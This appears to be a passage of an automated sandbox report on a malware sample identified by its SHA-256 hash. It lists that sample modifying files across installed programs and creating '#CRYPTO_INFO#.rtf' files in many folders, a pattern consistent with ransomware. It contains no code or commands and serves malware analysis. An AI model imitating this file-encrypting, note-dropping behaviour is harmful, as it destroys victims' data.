8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CPDF_Full.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_folder-disabled_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filterselected-dark-hover_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\x.cur 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\S_ThumbDownOutline_22_N.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\license.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\error_window.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_hover.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\be_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\fake_logo.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\ktab.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaSansDemiBold.ttf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse_1.1.200.v20140414-0825.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_link_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_close_h.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\crashreporter.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOffNotificationInAcrobat.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-es_es.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fa.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\rmid.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\javaws.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\GRAY.pf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_history_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_organize_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jsadebugd.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\orbd.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-keyring-impl.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluEmptyFolder_160.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_checkbox_selected_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\adc_logo.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_gridview-hover.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\SearchEmail2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fullscreen-exit.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\etc\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\PFM\SY______.PFM 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\tnameserv.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\VERSION.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\cs-cz\AppStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\s_checkbox_selected_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\DismountJoin.TTS 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\rmid.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.ja_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector_1.0.200.v20131115-1210.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\FillnSign_visual.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\security\US_export_policy.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\example_icons2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-api-caching.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\MANIFEST.MF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\AccessBridgeCallbacks.h 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActions.exsd 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_basestyle.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\dd_arrow_small2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\drive.crx 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\logo_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr\profile.jfc 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_download_pdf_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\form_responses.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\close.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper_1.0.400.v20130327-1442.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\javafx.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt_0.12.1.v20140903-1023.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\rhp\exportpdfupsell-app-tool-view.js 